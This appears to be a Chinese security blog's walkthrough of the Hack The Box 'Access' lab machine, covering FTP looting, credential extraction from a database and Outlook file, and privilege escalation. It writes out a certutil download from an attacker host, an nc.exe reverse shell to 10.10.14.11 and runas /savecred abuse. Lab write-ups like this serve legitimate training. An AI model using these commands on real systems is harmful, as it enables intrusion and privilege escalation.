本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com
大余安全
大家好,这里是 大余安全 的第 79 篇文章,本公众号会每日分享攻防渗透技术给大家。
靶机地址:https://www.hackthebox.eu/home/machines/profile/156
靶机难度:初级(4.0/10)
靶机发布日期:2019 年 2 月 25 日
靶机描述:
Access is an "easy" difficulty machine, that highlights how machines associated with the physical security of an environment may not themselves be secure. Also highlighted is how accessible FTP/file shares often lead to getting a foothold or lateral movement. It teaches techniques for identifying and exploiting saved credentials.
请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用 Kali Linux 作为解决该 HTB 的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。
一、信息收集
可以看到靶机的 IP 是 10.10.10.98....
Nmap 发现可以匿名登录 FTP,Telnet 和运行 IIS 7.5 的 Web 服务器运行着,IIS 7.5 知道是 Windows Server 2008 R2 版本...
80 页面可以看到视频监控的图片... 没获得什么信息...
直接来到 FTP 匿名登录了.. 发现两个文件,下载分析...
backup.mdb 是数据库文件... 找下底层有没有账号密码...
apt-get install mdbtools 这里需要下载 mdb 工具对数据库进行查看...
由于最近 HTB 老是出问题,我这里就最简洁的方式查看到了密码...
输入密码即可...
7z e Access\ Control.zip -paccess4u@security
这是 Microsoft Outlook 电子邮件文件夹...
apt-get install pst-utils
readpst 'Access Control.pst'
意思是创建了 Access Control.mbox 文件来读取内容...
首先看到的是这封电子邮件,其中包含名为的帐户的凭据 security,密码:
4CcessC0ntr0ller...
登陆 23 端口... 成功获得了 user 信息...
由于现在处于 security 用户下,无法进入管理员权限.. 在用户界面还存在 Public 用户,进去在桌面发现了 lnk 文件...
读取发现 Windows\System32\runas.exe 以管理员身份运行着...
Password required 设置为 No,如果设置为 Yes,将无法在 runas 不知道密码的情况下作为管理员进行使用...
这里的 runas 是允许我们以其他用户身份运行命令,并且该选项 / savecred 允许我们使用该命令无需输入密码...
这里直接上传 nc.exe,利用 runas /user:Administrator /savecred 无密码登陆模式执行反向 shell 即可...
certutil -urlcache -split -f http://10.10.14.11/nc.exe nc.exe
echo c:\users\security\nc.exe -e cmd.exe 10.10.14.11 6666 > shell.bat
runas /user:administrator /savecred c:\users\security\shell.bat
成功提权... 获得了 root 信息...
方法 2:
查看:
[Windows - Privilege Escalation](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)
文章可以进行 windows 的命令查询..
可以看到 windows 方式提权很多,前辈已经介绍了这类的方法... 开始把
使用 cmdkey 列出机器上存储的凭证... 并且存在一个凭证...
runas /user:Access\Administrator /savecred "cmd.exe /c type C:\Users\Administrator\Desktop\root.txt > C:\Users\security\Desktop\dayu.txt"
可以看到成功获得 root 信息...
由于我们已经成功得到 root 权限查看 user.txt 和 root.txt,因此完成了靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。
如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。
如果觉得这篇文章对你有帮助,可以转发到朋友圈,谢谢小伙伴~
随缘收徒中~~ 随缘收徒中~~ 随缘收徒中~~
欢迎加入渗透学习交流群,想入群的小伙伴们加我微信,共同进步共同成长!
大余安全
一个全栈渗透小技巧的公众号